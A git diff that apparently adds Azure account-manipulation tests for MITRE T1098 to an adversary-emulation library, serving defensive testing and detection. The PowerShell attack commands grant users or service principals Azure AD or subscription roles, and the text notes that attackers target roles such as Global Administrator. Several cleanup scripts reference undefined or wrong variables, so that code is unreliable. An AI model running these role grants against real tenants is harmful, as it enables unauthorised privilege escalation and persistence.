diff --git a/atomics/T1098/T1098.md b/atomics/T1098/T1098.md
index d6643fc3..08ccbe36 100644
--- a/atomics/T1098/T1098.md
+++ b/atomics/T1098/T1098.md
@@ -10,6 +10,14 @@
 
 - [Atomic Test #3 - AWS - Create a group and add a user to that group](#atomic-test-3---aws---create-a-group-and-add-a-user-to-that-group)
 
+- [Atomic Test #4 - Azure - adding user to Azure AD role](#atomic-test-4---azure---adding-user-to-azure-ad-role)
+
+- [Atomic Test #5 - Azure - adding service principal to Azure AD role](#atomic-test-5---azure---adding-service-principal-to-azure-ad-role)
+
+- [Atomic Test #6 - Azure - adding user to Azure role in subscription](#atomic-test-6---azure---adding-user-to-azure-role-in-subscription)
+
+- [Atomic Test #7 - Azure - adding service principal to Azure role in subscription](#atomic-test-7---azure---adding-service-principal-to-azure-role-in-subscription)
+
 
 <br/>
 
@@ -196,4 +204,303 @@ echo Please run atomic test T1136.003, before running this atomic test
 
 
 
+<br/>
+
+## Atomic Test #4 - Azure - adding user to Azure AD role
+The adversarie want to add user to some Azure AD role. Threat actor 
+may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
+Privileged authentication administrator (this role can reset Global Administrator password!).
+By default, the role Global Reader is assigned to service principal in this test.
+  
+The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
+
+Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type.
+
+**Supported Platforms:** Azure-ad
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| user_principal_name | Name of the targeted user (user principal) | String | SuperUser|
+| role_name | Name of the targeted role | String | Global Reader|
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+```powershell
+Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      if ($user -eq $null) { Write-Warning "User not found"; exit }
+      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+      Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId
+      Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD -ErrorAction Ignore
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential -ErrorAction Ignore
+
+      $user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      if ($user -eq $null) { Write-Warning "User not found"; exit }
+      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+      
+      Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId
+      Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+<br/>
+<br/>
+
+## Atomic Test #5 - Azure - adding service principal to Azure AD role
+The adversarie want to add service principal to some Azure AD role. Threat actor may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, Privileged authentication administrator (this role can reset Global Administrator password!).
+By default, the role Global Reader is assigned to service principal in this test.
+  
+The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
+
+Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type.
+**Supported Platforms:** Azure-ad
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| service_principal_name | Name of the targeted service principal | String | SuperSP|
+| role_name | Name of the targeted role | String | Global Reader|
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+```powershell
+Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+      if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+      Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId
+      Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD -ErrorAction Ignore
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential -ErrorAction Ignore
+
+      $sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+      if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+      Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId
+      Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: AzureAD module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name AzureAD -Force
+```
+
+<br/>
+<br/>
+
+## Atomic Test #6 - Azure - adding user to Azure role in subscription
+The adversarie want to add user to some Azure role, also called Azure resource role. Threat actor may be 
+interested primarily in highly privileged roles, e.g. Owner, Contributor.
+By default, the role Reader is assigned to user in this test.
+
+New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
+  
+The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
+(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
+and Microsoft Graph Directory.Read.All permissions.
+
+Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
+
+**Supported Platforms:** iaas:azure
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| user_principal_name | Name of the targeted user (user principal) | String | SuperUser|
+| role_name | Name of the targeted role | String | Reader|
+| subscription | Name of the targed subscription | String | Azure subscription 1|
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+```powershell
+Import-Module -Name Az.Resources
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzAccount -Credential $Credential
+
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      if ($user -eq $null) { Write-Warning "User not found"; exit }
+      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
+      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+      New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+      Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD -ErrorAction Ignore
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzAccount -Credential $Credential -ErrorAction Ignore
+
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      if ($user -eq $null) { Write-Warning "User not found"; exit }
+      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
+      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+      Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+      Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptionsName)"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Az.Resources module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az.Resources -Force
+```
+
+<br/>
+<br/>
+
+## Atomic Test #7 - Azure - adding service principal to Azure role in subscription
+The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor may be 
+interested primarily in highly privileged roles, e.g. Owner, Contributor.
+By default, the role Reader is assigned to service principal in this test.
+
+New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
+  
+The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
+(e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
+and Microsoft Graph Directory.Read.All permissions.
+
+Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
+
+**Supported Platforms:** iaas:azure
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| username | Azure AD username | String | jonh@contoso.com|
+| password | Azure AD password | String | p4sswd|
+| service_principal_name | Name of the targeted service principal | String | SuperSP|
+| role_name | Name of the targeted role | String | Reader|
+| subscription | Name of the targed subscription | String | Azure subscription 1|
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+```powershell
+Import-Module -Name Az.Resources
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzAccount -Credential $Credential
+
+      $sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+      if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} 
+      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+      New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+      Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module -Name AzureAD -ErrorAction Ignore
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzAccount -Credential $Credential -ErrorAction Ignore
+
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      if ($user -eq $null) { Write-Warning "User not found"; exit }
+      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
+      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+      Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+      Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptionsName)"
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: Az.Resources module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name Az.Resources -Force
+```
+
+<br/>
 <br/>
diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml
index 8d72ceb3..b615e766 100644
--- a/atomics/T1098/T1098.yaml
+++ b/atomics/T1098/T1098.yaml
@@ -128,4 +128,286 @@ atomic_tests:
       aws iam delete-group --group-name #{username}
     name: sh
 
+- name: Azure - adding user to Azure AD role
+  description: |
+    The adversarie want to add user to some Azure AD role. Threat actor 
+    may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
+    Privileged authentication administrator (this role can reset Global Administrator password!).
+    By default, the role Global Reader is assigned to service principal in this test.
+  
+    The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
 
+    Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see User as a type.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Azure AD username
+      type: String
+      default: jonh@contoso.com
+    password:
+      description: Azure AD password
+      type: String
+      default: p4sswd
+    user_principal_name:
+      description: Name of the targeted user (user principal)
+      type: String
+      default: SuperUser
+    role_name:
+      description: Name of the targed Azure AD role
+      type: String
+      default: Global Reader 
+  dependencies:
+  - description: |
+      AzureAD module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  executor:
+    command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      if ($user -eq $null) { Write-Warning "User not found"; exit }
+      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+      Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $user.ObjectId
+      Write-Host "User $($user.DisplayName) was added to $($role.DisplayName) role"
+    cleanup_command: |
+      Import-Module -Name AzureAD -ErrorAction Ignore
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential -ErrorAction Ignore
+
+      $user = Get-AzureADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      if ($user -eq $null) { Write-Warning "User not found"; exit }
+      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+      
+      Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $user.ObjectId
+      Write-Host "User $($user.DisplayName) was removed from $($role.DisplayName) role"
+    name: powershell
+    elevation_required: false
+
+- name: Azure - adding service principal to Azure AD role
+  description: |
+    The adversarie want to add service principal to some Azure AD role. Threat actor 
+    may be interested primarily in highly privileged roles, e.g. Global Administrator, Application Administrator, 
+    Privileged authentication administrator (this role can reset Global Administrator password!).
+    By default, the role Global Reader is assigned to service principal in this test.
+  
+    The account you use to run the PowerShell command should have Privileged Role Administrator or Global Administrator role in your Azure AD.
+
+    Detection hint - check Activity "Add member to role" in Azure AD Audit Logs. In targer you will also see Service Principal as a type.
+  supported_platforms:
+  - azure-ad
+  input_arguments:
+    username:
+      description: Azure AD username
+      type: String
+      default: jonh@contoso.com
+    password:
+      description: Azure AD password
+      type: String
+      default: p4sswd
+    service_principal_name:
+      description: Name of the service principal
+      type: String
+      default: SuperSP
+    role_name:
+      description: Name of the targed Azure AD role
+      type: String
+      default: Global Reader 
+  dependencies:
+  - description: |
+      AzureAD module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name AzureAD -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name AzureAD -Force
+  executor:
+    command: |
+      Import-Module -Name AzureAD
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential
+
+      $sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+      if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+      Add-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -RefObjectId $sp.ObjectId
+      Write-Host "Service Principal $($sp.DisplayName) was added to $($role.DisplayName)"
+    cleanup_command: |
+      Import-Module -Name AzureAD -ErrorAction Ignore
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzureAD -Credential $Credential -ErrorAction Ignore
+
+      $sp = Get-AzureADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+      if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+      $role = Get-AzureADDirectoryRole | where-object {$_.DisplayName -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+      Remove-AzureADDirectoryRoleMember -ObjectId $role.ObjectId -MemberId $sp.ObjectId
+      Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.DisplayName) role"
+    name: powershell
+    elevation_required: false
+
+- name: Azure - adding user to Azure role in subscription
+  description: |
+    The adversarie want to add user to some Azure role, also called Azure resource role. Threat actor 
+    may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
+    By default, the role Reader is assigned to user in this test.
+
+    New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
+  
+    The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
+    (e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
+    and Microsoft Graph Directory.Read.All permissions.
+
+    Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
+  supported_platforms:
+  - iaas:azure
+  input_arguments:
+    username:
+      description: Azure AD username
+      type: String
+      default: jonh@contoso.com
+    password:
+      description: Azure AD password
+      type: String
+      default: p4sswd
+    user_principal_name:
+      description: Name of the targeted user (user principal)
+      type: String
+      default: SuperUser
+    role_name:
+      description: Name of the targed Azure role
+      type: String
+      default: Reader
+    subscription:
+      description: Name of the targed subscription
+      type: String
+      default: Azure subscription 1
+  dependencies:
+  - description: |
+      Az.Resources module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name Az.Resources -Force
+  executor:
+    command: |
+      Import-Module -Name Az.Resources
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzAccount -Credential $Credential
+
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      if ($user -eq $null) { Write-Warning "User not found"; exit }
+      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
+      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+      New-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+      Write-Host "User $($user.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
+    cleanup_command: |
+      Import-Module -Name AzureAD -ErrorAction Ignore
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzAccount -Credential $Credential -ErrorAction Ignore
+
+      $user = Get-AzADUser | where-object {$_.DisplayName -eq "#{user_principal_name}"}
+      if ($user -eq $null) { Write-Warning "User not found"; exit }
+      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"}
+      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+      Remove-AzRoleAssignment -ObjectId $user.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+      Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
+    name: powershell
+    elevation_required: false
+
+- name: Azure - adding service principal to Azure role in subscription
+  description: |
+    The adversarie want to add service principal to some Azure role, also called Azure resource role. Threat actor 
+    may be interested primarily in highly privileged roles, e.g. Owner, Contributor.
+    By default, the role Reader is assigned to service principal in this test.
+
+    New-AzRoleAssignment cmdlet could be also use to assign user/service principal to resource, resource group and management group.
+  
+    The account you use to run the PowerShell command must have Microsoft.Authorization/roleAssignments/write 
+    (e.g. such as User Access Administrator or Owner) and the Azure Active Directory Graph Directory.Read.All 
+    and Microsoft Graph Directory.Read.All permissions.
+
+    Detection hint - check Operation Name "Create role assignment" in subscriptions Activity Logs.
+  supported_platforms:
+  - iaas:azure
+  input_arguments:
+    username:
+      description: Azure AD username
+      type: String
+      default: jonh@contoso.com
+    password:
+      description: Azure AD password
+      type: String
+      default: p4sswd
+    service_principal_name:
+      description: Name of the service principal
+      type: String
+      default: SuperSP
+    role_name:
+      description: Name of the targed Azure role
+      type: String
+      default: Reader 
+    subscription:
+      description: Name of the targed subscription
+      type: String
+      default: Azure subscription 1  
+  dependencies:
+  - description: |
+      Az.Resources module must be installed.
+    prereq_command: |
+      try {if (Get-InstalledModule -Name Az.Resources -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+    get_prereq_command: |
+      Install-Module -Name Az.Resources -Force
+  executor:
+    command: |
+      Import-Module -Name Az.Resources
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzAccount -Credential $Credential
+
+      $sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+      if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} 
+      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+
+      New-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+      Write-Host "Service Principal $($sp.DisplayName) was added to $($role.Name) role in subscriptions $($subscriptions.Name)"
+    cleanup_command: |
+      Import-Module -Name AzureAD -ErrorAction Ignore
+      $PWord = ConvertTo-SecureString -String "#{password}" -AsPlainText -Force
+      $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{username}", $Pword
+      Connect-AzAccount -Credential $Credential -ErrorAction Ignore
+
+      $sp = Get-AzADServicePrincipal | where-object {$_.DisplayName -eq "#{service_principal_name}"}
+      if ($sp -eq $null) { Write-Warning "Service Principal not found"; exit }
+      $subscription = Get-AzSubscription | where-object {$_.Name -eq "#{subscription}"} 
+      if ($subscription -eq $null) { Write-Warning "Subscription not found"; exit }
+      $role = Get-AzRoleDefinition | where-object {$_.Name -eq "#{role_name}"}
+      if ($role -eq $null) { Write-Warning "Role not found"; exit }
+      
+      Remove-AzRoleAssignment -ObjectId $sp.id -RoleDefinitionId $role.id -Scope /subscriptions/$subscription
+      Write-Host "Service Principal $($sp.DisplayName) was removed from $($role.Name) role in subscriptions $($subscriptions.Name)"
+    name: powershell
+    elevation_required: false